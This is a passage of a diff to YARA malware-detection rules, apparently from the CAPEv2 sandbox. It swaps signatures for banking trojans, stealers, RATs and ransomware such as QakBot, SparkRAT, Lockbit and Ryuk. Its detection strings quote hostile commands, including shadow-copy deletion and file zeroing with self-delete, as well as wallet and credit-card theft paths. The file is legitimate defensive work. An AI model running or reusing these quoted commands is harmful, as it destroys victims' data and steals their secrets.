01 0F B6 C0 B9 ?? 00 00 00 2B C8 6B C1 ?? 99 F7 FE 8D [2] 99 F7 FE 88 ?? FF 83 EB 01 75 DD} + $website1 = "https://contirecovery.info" ascii wide + $website2 = "https://contirecovery.best" ascii wide condition: - all of ($str*) or any of ($code*) + uint16(0)==0x5A4D and any of them } -rule CAPE_Trickbot_Permadll_UEFI_Module +rule CAPE_Sparkrat { meta: - description = "Detects TrickBot Banking module permaDll" - author = "@VK_Intel | Advanced Intelligence" - id = "ba104164-0a1a-5a4c-8312-7653f7818e96" - date = "2023-02-07" - modified = "2023-02-07" + description = "SparkRAT Payload" + author = "t-mtsmt" + id = "6b30b2d5-5b32-5347-832d-814b43eab945" + date = "2024-08-04" + modified = "2024-08-04" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/TrickBot.yar#L22-L38" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - hash = "491115422a6b94dc952982e6914adc39" - logic_hash = "564055f56fd19bed8900e6d451ba050b4e9013a9208a3bdc3d3d563567d225d2" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/SparkRAT.yar#L1-L49" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "96d9cc4411c01fec33aa8be19c06395ff07726a5e2b9c968674e0cadecf10caf" score = 75 - quality = 70 + quality = 68 tags = "" + cape_type = "SparkRAT Payload" strings: - $module_cfg = "moduleconfig" - $str_imp_01 = "Start" - $str_imp_02 = "Control" - $str_imp_03 = "FreeBuffer" - $str_imp_04 = "Release" - $module = "user_platform_check.dll" - $intro_routine = { 83 ec 40 8b ?? ?? ?? 53 8b ?? ?? ?? 55 33 ed a3 ?? ?? ?? ?? 8b ?? ?? ?? 56 57 89 ?? ?? ?? a3 ?? ?? ?? ?? 39 ?? ?? ?? ?? ?? 75 ?? 8d ?? ?? ?? 89 ?? ?? ?? 50 6a 40 8d ?? ?? ?? ?? ?? 55 e8 ?? ?? ?? ?? 85 c0 78 ?? 8b ?? ?? ?? 85 ff 74 ?? 47 57 e8 ?? ?? ?? ?? 8b f0 59 85 f6 74 ?? 57 6a 00 56 e8 ?? ?? ?? ?? 83 c4 0c eb ??} + $path_00 = "/client/common" + $path_01 = "/client/config" + $path_02 = "/client/core" + $path_03 = "/client/service/basic" + $path_04 = "/client/service/desktop" + $path_05 = "/client/service/file" + $path_06 = "/client/service/process" + $path_07 = "/client/service/terminal" + $path_08 = "/modules" + $path_09 = "/utils" + $cmd_00 = "PING" + $cmd_01 = "OFFLINE" + $cmd_02 = "LOCK" + $cmd_03 = "LOGOFF" + $cmd_04 = "HIBERNATE" + $cmd_05 = "SUSPEND" + $cmd_06 = "RESTART" + $cmd_07 = "SHUTDOWN" + $cmd_08 = "SCREENSHOT" + $cmd_09 = "TERMINAL_INIT" + $cmd_10 = "TERMINAL_INPUT" + $cmd_11 = "TERMINAL_RESIZE" + $cmd_12 = "TERMINAL_PING" + $cmd_13 = "TERMINAL_KILL" + $cmd_14 = "FILES_LIST" + $cmd_15 = "FILES_FETCH" + $cmd_16 = "FILES_REMOVE" + $cmd_17 = "FILES_UPLOAD" + $cmd_18 = "FILE_UPLOAD_TEXT" + $cmd_19 = "PROCESSES_LIST" + $cmd_20 = "PROCESS_KILL" + $cmd_21 = "DESKTOP_INIT" + $cmd_22 = "DESKTOP_PING" + $cmd_23 = "DESKTOP_KILL" + $cmd_24 = "DESKTOP_SHOT" + $cmd_25 = "COMMAND_EXEC" condition: - 6 of them + 3 of ($path_*) and 3 of ($cmd_*) } -rule CAPE_Atlas : FILE +rule CAPE_Tscookie : FILE { meta: - description = "Atlas Payload" + description = "TSCookie Payload" author = "kevoreilly" - id = "22322e5c-ded6-56df-8a39-a8f5cbc18239" + id = "e1efd356-7170-5454-bf40-68927c71816c" date = "2019-10-30" modified = "2019-10-30" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/Atlas.yar#L1-L13" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "c3f73b29df5caf804dbfe3e6ac07a9e2c772bd2a126f0487e4a65e72bd501e6e" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/TSCookie.yar#L1-L13" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "0461c7fd14c74646437654f0a63a4a89d4efad620e197a8ca1e8d390618842c3" score = 75 quality = 70 tags = "FILE" - cape_type = "Atlas Payload" + cape_type = "TSCookie Payload" strings: - $a1 = "bye.bat" - $a2 = "task=knock&id=%s&ver=%s x%s&disks=%s&other=%s&ip=%s&pub=" - $a3 = "process call create \"cmd /c start vssadmin delete shadows /all /q" + $string1 = "http://%s:%d" wide + $string2 = "/Default.aspx" wide + $string3 = "\\wship6" condition: - uint16(0)==0x5A4D and ( all of ($a*)) + uint16(0)==0x5A4D and all of them } -rule CAPE_Dreambot : FILE +rule CAPE_Ursnifv3_1 : FILE { meta: - description = "Dreambot Payload" + description = "UrsnifV3 Payload" author = "kevoreilly" - id = "675c2fea-fe48-5afd-9fa1-de919134892f" + id = "9dd32f80-b535-52a3-91e1-4db005362fd4" + date = "2023-03-23" + modified = "2023-03-23" + reference = "https://github.com/kevoreilly/CAPEv2" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/UrsnifV3.yar#L1-L18" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "501cd52388aba16f9d33b4555f310e1ad58326916b15358a485c701acb87abd8" + score = 75 + quality = 70 + tags = "FILE" + cape_type = "UrsnifV3 Payload" + packed = "75827be0c600f93d0d23d4b8239f56eb8c7dc4ab6064ad0b79e6695157816988" + packed = "5d6f1484f6571282790d64821429eeeadee71ba6b6d566088f58370634d2c579" + + strings: + $crypto32_1 = {8B C3 83 EB 01 85 C0 75 0D 0F B6 16 83 C6 01 89 74 24 14 8D 58 07 8B C2 C1 E8 07 83 E0 01 03 D2 85 C0 0F 84 AB 01 00 00 8B C3 83 EB 01 85 C0 89 5C 24 20 75 13 0F B6 16 83 C6 01 BB 07 00 00 00} + $crypto32_2 = {8B 45 ?? 0F B6 3? FF 45 [2-4] 8B C? 23 C? 40 40 D1 E? 7?} + $crypto32_3 = {F6 46 03 02 75 5? 8B 46 10 40 50 E8 [10-12] 74 ?? F6 46 03 01 74} + $crypto32_4 = {C7 44 24 10 01 00 00 00 8B 4? 10 [12] 8B [2] 89 01 8B 44 24 10 5F 5E 5B 8B E5 5D C2 0C 00} + $cpuid = {8B C4 FF 18 8B F0 33 C0 0F A2 66 8C D8 66 8E D0 8B E5 8B C6 5E 5B 5D C3} + $cape_string = "cape_options" + + condition: + uint16(0)==0x5A4D and 1 of ($crypto32_*) and $cpuid and not $cape_string +} +rule CAPE_Ramnit : FILE +{ + meta: + description = "Ramnit Payload" + author = "kevoreilly" + id = "6df92055-05f6-5985-9268-b9c85e143567" date = "2019-10-30" modified = "2019-10-30" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/Dreambot.yar#L1-L14" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "29c6d648d5d38667c5824c2d20a83a20448c2ae6054ddddb2b2b7f8bdb69f74b" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/Ramnit.yar#L1-L13" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "6f661f47bdf8377b0fb96f190fcb964c0ed2b43ce7ae7880f9dfce9e43837efd" score = 75 quality = 70 tags = "FILE" - cape_type = "Dreambot Payload" + cape_type = "Ramnit Payload" strings: - $a1 = {53 56 33 F6 33 DB C1 6C 24 0C 02 74 2F 8B 02 85 C0 75 11 83 7C 24 0C 02 76 0A 39 42 04 75 05 39 42 08 74 18 43 8A CB D3 C0 33 C6 33 44 24 10 8B F0 89 32 83 C2 04 FF 4C 24 0C 75 D1 5E 5B C2 08 00} - $a2 = {53 33 C9 33 DB C1 6C 24 08 02 74 22 56 8B 02 85 C0 8B F0 74 18 33 C1 33 44 24 10 43 8A CB D3 C8 8B CE 89 02 83 C2 04 FF 4C 24 0C 75 E0 5E 5B C2 08 00} - $b1 = "Oct 5 2016" - $b2 = ".bss" + $DGA = {33 D2 B9 1D F3 01 00 F7 F1 8B C8 B8 A7 41 00 00 F7 E2 8B D1 8B C8 B8 14 0B 00 00 F7 E2 2B C8 33 D2 8B C1 8B} + $xor_loop = {83 7D 0C 00 74 27 83 7D 14 00 74 21 8B 4D 0C 8B 7D 08 8B 75 10 BA 00 00 00 00 0B D2 75 04 8B 55 14 4A 8A 1C 32 32 1F 88 1F 47 4A E2 ED} + $id_string = "{%08X-%04X-%04X-%04X-%08X%04X}" condition: - uint16(0)==0x5A4D and (1 of ($a*)) and ( all of ($b*)) + uint16(0)==0x5A4D and all of ($*) } -rule CAPE_Stealc : FILE +rule CAPE_Tclient : FILE { meta: - description = "Stealc Payload" + description = "TClient Payload" author = "kevoreilly" - id = "44a00d4b-0053-5b3d-baa4-b666f7182ba0" - date = "2024-02-16" - modified = "2024-02-16" + id = "38c9ea20-9d91-5fb0-8b3b-170538ad7ea8" + date = "2022-06-09" + modified = "2022-06-09" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/Stealc.yar#L1-L13" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - hash = "77d6f1914af6caf909fa2a246fcec05f500f79dd56e5d0d466d55924695c702d" - logic_hash = "90a3a72f53d0c020f1568d7bbf183ee4f76ec3f4706d2331bcbc4e631bf6399d" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/TClient.yar#L1-L11" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "6edcd01e4722b367723ed77d9596877d16ee35dc4c160885d125f83e45cee24d" score = 75 quality = 70 tags = "FILE" - cape_type = "Stealc Payload" + cape_type = "TClient Payload" strings: - $nugget1 = {68 04 01 00 00 6A 00 FF 15 [4] 50 FF 15 [4] 8B F?} - $nugget2 = {64 A1 30 00 00 00 8B 40 0C 8B 40 0C 8B 00 8B 00 8B 40 18 89 45 FC} + $code1 = {41 0F B6 00 4D 8D 40 01 34 01 8B D7 83 E2 07 0F BE C8 FF C7 41 0F BE 04 91 0F AF C1 41 88 40 FF 81 FF 80 03 00 00 7C D8} condition: - uint16(0)==0x5A4D and all of them + uint16(0)==0x5A4D and any of ($code*) } -rule CAPE_Qakbot5 : FILE +rule CAPE_Hermes : FILE { meta: - description = "QakBot v5 Payload" - author = "kevoreilly, enzok" - id = "48866cdd-f60e-50b8-85f9-573710934b0b" - date = "2024-04-28" - modified = "2024-04-28" + description = "Hermes Payload" + author = "kevoreilly" + id = "0ff44422-9c14-517b-9e71-8e9e19694f06" + date = "2019-10-30" + modified = "2019-10-30" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/QakBot.yar#L1-L15" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - hash = "59559e97962e40a15adb2237c4d01cfead03623aff1725616caeaa5a8d273a35" - logic_hash = "cc23a92f45619d44af824128b743c259dd9dfa7cb5106932f3425f3dfd1dccdf" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/Hermes.yar#L1-L13" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "9bc974173f39a57e7adfbf8ae106a20d960557696b4c3ce16e9b4e47d3e9e95b" score = 75 quality = 70 tags = "FILE" - cape_type = "QakBot Payload" - packed = "f4bb0089dcf3629b1570fda839ef2f06c29cbf846c5134755d22d419015c8bd2" + cape_type = "Hermes Payload" strings: - $loop = {8B 75 ?? 48 8B 4C [2] FF 15 [4] 48 8B 4C [2] 48 8B 01 FF 50 ?? 8B DE 48 8B 4C [2] 48 85 C9 0F 85 [4] EB 4E} - $c2list = {0F B7 1D [4] B? [2] 00 00 E8 [4] 8B D3 4? 89 45 ?? 4? 33 C9 4? 8D 0D [4] 4? 8B C0 4? 8B F8 E8} - $campaign = {0F B7 1D [4] B? [2] 00 00 E8 [4] 8B D3 4? 89 44 24 ?? 4? 33 C9 4? 8D 0D [4] 4? 8B C0 4? 8B F8 E8} + $ext = ".HRM" wide + $vss = "vssadmin Delete" + $email = "supportdecrypt@firemail.cc" wide condition: - uint16(0)==0x5A4D and 2 of them + uint16(0)==0x5A4D and all of ($*) } -rule CAPE_Qakbot4 : FILE +rule CAPE_Lockbit : FILE { meta: - description = "QakBot v4 Payload" + description = "Lockbit Payload" author = "kevoreilly" - id = "d2c5316c-22cc-5b6d-b6a2-b1d23a06d16b" - date = "2024-04-28" - modified = "2024-04-28" + id = "ec9b4fec-0233-5277-b922-07057c2b4b34" + date = "2022-06-09" + modified = "2022-06-09" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/QakBot.yar#L17-L35" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "b2870e33abffbb3ff49b7891b0f5c538ab48ee63da5553929d4e37dec921344f" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/Lockbit.yar#L1-L15" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "80ab705c8246a0bd5b3de65146cf32b102f39bf9444bdf1d366b5a794c1229b9" score = 75 quality = 70 tags = "FILE" - cape_type = "QakBot Payload" + cape_type = "Lockbit Payload" strings: - $crypto1 = {8B 5D 08 0F B6 C2 8A 16 0F B6 1C 18 88 55 13 0F B6 D2 03 CB 03 CA 81 E1 FF 00 00 80 79 08 49 81 C9 00 FF FF FF 41} - $sha1_1 = {5? 33 F? [0-9] 89 7? 24 ?? 89 7? 24 ?? 8? [1-3] 24 [1-4] C7 44 24 ?0 01 23 45 67 C7 44 24 ?4 89 AB CD EF C7 44 24 ?8 FE DC BA 98 C7 44 24 ?C 76 54 32 10 C7 44 24 ?0 F0 E1 D2 C3} - $sha1_2 = {33 C0 C7 01 01 23 45 67 89 41 14 89 41 18 89 41 5C C7 41 04 89 AB CD EF C7 41 08 FE DC BA 98 C7 41 0C 76 54 32 10 C7 41 10 F0 E1 D2 C3 89 41 60 89 41 64 C3} - $anti_sandbox1 = {8D 4? FC [0-1] E8 [4-7] E8 [4] 85 C0 7E (04|07) [4-7] 33 (C0|D2) 74 02 EB FA} - $anti_sandbox2 = {8D 45 ?? 50 E8 [2] 00 00 59 68 [4] FF 15 [4] 89 45 ?? 83 7D ?? 0F 76 0C} - $decrypt_config1 = {FF 37 83 C3 EC 53 8B 5D 0C 8D 43 14 50 6A 14 53 E8 ?? ?? ?? ?? 83 C4 14 85 C0 ?? 26 ?? ?? 86 20 02 00 00 66 85 C0 ?? ?? FF 37 FF 75 10 53} - $decrypt_config2 = {8B 45 08 8B 88 24 04 00 00 51 8B 55 10 83 EA 14 52 8B 45 0C 83 C0 14 50 6A 14 8B 4D 0C 51 E8 6C 08 00 00} - $decrypt_config3 = {6A 13 8B CE 8B C3 5A 8A 18 3A 19 75 05 40 41 4A 75 F5 0F B6 00 0F B6 09 2B C1 74 05 83 C8 FF EB 0E} - $call_decrypt = {83 7D ?? 00 56 74 0B FF 75 10 8B F3 E8 [4] 59 8B 45 0C 83 F8 28 72 19 8B 55 08 8B 37 8D 48 EC 6A 14 8D 42 14 52 E8} + $string1 = "/C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 \"%s\" & Del /f /q \"%s\"" wide + $string2 = "Ransom" ascii wide + $crypto = {8B 4D 08 C1 E9 10 0F B6 D1 8B 4D 0C C1 E9 08 0F B6 C9 8B 14 95 [4] 8B 7D FC 33 14 8D [4] 8B CF C1 E9 18 33 14 8D [4] 0F B6 CB 33 14 8D [4] 8B CF 33 10} + $decode1 = {8A ?4 34 ?C 0? 00 00 8B 8? 24 ?8 0? 00 00 0F BE ?? 0F BE C? 33 ?? 88 ?? 34 ?? 0? 00 00 46 83 FE 0? 72 DD} + $decode2 = {8A 44 24 ?? 30 44 0C ?? 41 83 F9 ?? 72 F2} condition: - uint16(0)==0x5A4D and any of ($*) + uint16(0)==0x5A4D and (2 of them ) } -rule CAPE_Arkei : FILE +rule CAPE_Azorult : FILE { meta: - description = "Arkei Payload" + description = "Azorult Payload" author = "kevoreilly" - id = "22ebe194-19a9-5bf2-9cfc-ea27b7724572" - date = "2020-02-11" - modified = "2020-02-11" + id = "ca76ec00-001f-56d0-bdbc-9dfd3239fba8" + date = "2022-06-09" + modified = "2022-06-09" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/Arkei.yar#L1-L24" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "03980827db1c53d4090ab196ba820ca34b5d83dc7140b11ead9182cb5d28c7d3" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/Azorult.yar#L1-L12" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "4691cf48d513d1965416b0cce1b6e19c8f7b393a940afd68b7c6ca8c0d125d90" score = 75 quality = 70 tags = "FILE" - cape_type = "Arkei Payload" + cape_type = "Azorult Payload" strings: - $string1 = "Windows_Antimalware_Host_System_Worker" - $string2 = "Arkei" - $string3 = "Bitcoin\\wallet.dat" - $string4 = "Ethereum\\keystore" - $v1 = "C:\\Windows\\System32\\cmd.exe" fullword ascii wide - $v2 = "/c taskkill /im " fullword ascii - $v3 = "card_number_encrypted FROM credit_cards" ascii - $v4 = "\\wallet.dat" ascii - $v5 = "Arkei/" wide - $v6 = "files\\passwords." ascii wide - $v7 = "files\\cc_" ascii wide - $v8 = "files\\autofill_" ascii wide - $v9 = "files\\cookies_" ascii wide + $code1 = {C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 00 00 00 8D 85 80 F5 FF FF 89 47 2C C7 47 30 00 08 00 00 8D 85 80 F1 FF FF 89 47 34 C7 47 38 00 04 00 00 57 68 00 00 00 90} + $string1 = "SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),\"unixepoch\")" condition: - uint16(0)==0x5A4D and ( all of ($string*) or 7 of ($v*)) + uint16(0)==0x5A4D and all of them } -rule CAPE_Scarab : FILE +rule CAPE_Icedid { meta: - description = "Scarab Payload" - author = "kevoreilly" - id = "2ba8ae50-1e56-5773-aaea-058161b59c78" - date = "2019-10-30" - modified = "2019-10-30" + description = "IcedID Payload" + author = "kevoreilly, threathive" + id = "439342be-a1e6-5656-8813-5cebb0e88e98" + date = "2021-12-16" + modified = "2021-12-16" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/Scarab.yar#L1-L13" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "0d8fa7ab4c8e5699f17f9e9444e85a42563a840a8e7ee9eda54add3a6845d1c6" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/IcedID.yar#L1-L18" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "e60ccbab7a360020744eba65961156ca3e2ae9cf23671014f913d71c1a96a331" score = 75 - quality = 70 - tags = "FILE" - cape_type = "Scarab Payload" + quality = 45 + tags = "" + cape_type = "IcedID Payload" strings: - $crypt1 = {8B D8 32 1A 0F B6 DB 8B 1C 9F C1 E8 08 33 D8 8B C3 42 8B D8 32 1A 0F B6 DB 8B 1C 9F C1 E8 08 33 D8 8B C3 42 8B D8 32 1A 0F B6 DB 8B 1C 9F C1 E8 08} - $crypt2 = {8B 4C 82 0C 8B D9 C1 E3 18 C1 E9 08 0B D9 8B CB 0F B6 D9 8B 1C 9D AC 0C 43 00 89 5C 24 04 8B D9 C1 EB 08 0F B6 DB 8B 34 9D AC 0C 43 00 8B D9 C1 EB 10} - $crypt3 = {8B 13 8B CA 81 E1 80 80 80 80 8B C1 C1 E8 07 50 8B C1 59 2B C1 25 1B 1B 1B 1B 8B CA 81 E1 7F 7F 7F 7F 03 C9 33 C1 8B C8 81 E1 80 80 80 80 8B F1 C1 EE 07} + $crypt1 = {8A 04 ?? D1 C? F7 D? D1 C? 81 E? 20 01 00 00 D1 C? F7 D? 81 E? 01 91 00 00 32 C? 88} + $crypt2 = {8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3} + $crypt3 = {41 00 8B C8 C1 E1 08 0F B6 C4 66 33 C8 66 89 4? 24 A1 ?? ?? 41 00 89 4? 20 A0 ?? ?? 41 00 D0 E8 32 4? 32} + $download1 = {8D 44 24 40 50 8D 84 24 44 03 00 00 68 04 21 40 00 50 FF D5 8D 84 24 4C 01 00 00 C7 44 24 28 01 00 00 00 89 44 24 1C 8D 4C 24 1C 8D 84 24 4C 03 00 00 83 C4 0C 89 44 24 14 8B D3 B8 BB 01 00 00 66 89 44 24 18 57} + $download2 = {8B 75 ?? 8D 4D ?? 8B 7D ?? 8B D6 57 89 1E 89 1F E8 [4] 59 3D C8 00 00 00 75 05 33 C0 40 EB} + $major_ver = {0F B6 05 ?? ?? ?? ?? 6A ?? 6A 72 FF 75 0C 6A 70 50 FF 35 ?? ?? ?? ?? 8D 45 80 FF 35 ?? ?? ?? ?? 6A 63 FF 75 08 6A 67 50 FF 75 10 FF 15 ?? ?? ?? ?? 83 C4 38 8B E5 5D C3} + $stage_2_request_binary = "id=" + $stage_2_request_img = ".png" condition: - uint16(0)==0x5A4D and all of them + any of ($crypt*,$download*,$major_ver) and all of ($stage_2_request_*) } -rule CAPE_Gootkit : FILE +rule CAPE_Rozena { meta: - description = "Gootkit Payload" - author = "kevoreilly" - id = "8935fd10-ac79-5196-80c2-fc8f2fe185b5" - date = "2019-10-30" - modified = "2019-10-30" + description = "No description has been set in the source file - CAPE" + author = "Kevin O'Reilly" + id = "38ca9da3-2a0e-500f-8eb8-9de69a7f2da5" + date = "2024-03-15" + modified = "2024-03-15" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/Gootkit.yar#L1-L11" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "26704b6b0adca51933fc9d5e097930320768fd0e9355dcefc725aee7775316e7" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/Rozena.yar#L1-L10" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "c415a8108b58a125a604031bb8d73b58a8aae5429b5b765e35fa8a4add9cd135" score = 75 quality = 70 - tags = "FILE" - cape_type = "Gootkit Payload" + tags = "" + cape_type = "Rozena Payload" strings: - $code1 = {C7 45 ?? ?? ?? 4? 00 C7 45 ?? ?? 10 40 00 C7 45 E? D8 ?? ?? 00 C7 45 ?? 00 00 00 00 C7 45 ?? 00 00 00 00 [1-2] 00 10 40 00 89 [5-6] 43 00 89 ?? ?? 68 E8 80 00 00 FF 15} + $ip_port = {FF D5 6A 0A 68 [4] 68 [4] 89 E6 50 50 50 50 40 50 40 50 68 [4] FF D5} + $socket = {6A 00 6A 04 56 57 68 [4] FF D5 [0-5] 8B 36 6A 40 68 00 10 00 00 56 6A 00 68} condition: - uint16(0)==0x5A4D and all of them + all of them } -rule CAPE_Sedreco : FILE +rule CAPE_Bumblebeeshellcode_1 { meta: - description = "Sedreco encrypt function entry" + description = "BumbleBee Loader 2023" author = "kevoreilly" - id = "5b9ee4af-50a4-597c-8fa5-f2094c312d23" - date = "2022-06-09" - modified = "2022-06-09" + id = "e04f80d0-3a57-51bc-8a54-639c7291a0d8" + date = "2023-10-02" + modified = "2023-10-02" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/Sedreco.yar#L1-L15" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "f735549606917f59a19157e604e54766e4456bc5d46e94cae3e0a3c18b52a7ca" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/BumbleBee.yar#L18-L33" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "d56f8c4e491d0d1b34e396e73750bef9917ca4f708fb6a2681de772a65c13a40" score = 75 quality = 70 - tags = "FILE" - cape_type = "Sedreco Payload" + tags = "" + cape_type = "BumbleBeeLoader Payload" + packed = "51bb71bd446bd7fc03cc1234fcc3f489f10db44e312c9ce619b937fad6912656" strings: - $encrypt1 = {55 8B EC 83 EC 2C 53 56 8B F2 57 8B 7D 08 B8 AB AA AA AA} - $encrypt2 = {55 8B EC 83 EC 20 8B 4D 10 B8 AB AA AA AA} - $encrypt64_1 = {48 89 4C 24 08 53 55 56 57 41 54 41 56 48 83 EC 18 45 8D 34 10 48 8B E9 B8 AB AA AA AA 4D 8B E1 44 89 44 24 60 41 F7 E0 8B F2 B8 AB AA AA AA} + $setpath = "setPath" + $alloc = {B8 01 00 00 00 48 6B C0 08 48 8D 0D [2] 00 00 48 03 C8 48 8B C1 48 89 [3] 00 00 00 8B 44 [2] 05 FF 0F 00 00 25 00 F0 FF FF 8B C0 48 89} + $hook = {48 85 C9 74 20 48 85 D2 74 1B 4C 8B C9 45 85 C0 74 13 48 2B D1 42 8A 04 0A 41 88 01 49 FF C1 41 83 E8 01 75 F0 48 8B C1 C3} + $algo = {41 8B C1 C1 E8 0B 0F AF C2 44 3B C0 73 6A 4C 8B [3] 44 8B C8 B8 00 08 00 00 2B C2 C1 E8 05 66 03 C2 8B 94 [2] 00 00 00} + $cape_string = "cape_options" condition: - uint16(0)==0x5A4D and $encrypt1 or $encrypt2 or $encrypt64_1 + 2 of them and not $cape_string } -rule CAPE_Doppelpaymer : FILE +rule CAPE_Ryuk : FILE { meta: - description = "DoppelPaymer Payload" + description = "Ryuk Payload" author = "kevoreilly" - id = "c8178906-1722-5908-9ad4-7ee1eef39138" - date = "2022-06-27" - modified = "2022-06-27" + id = "594bbb8d-1f85-5a01-a864-ac2d95c45bf9" + date = "2019-10-30" + modified = "2019-10-30" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/DoppelPaymer.yar#L1-L13" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "73a2575671bafc31a70af3ce072d6f94ae172b12202baebba586a02524cb6f9d" + source_url = 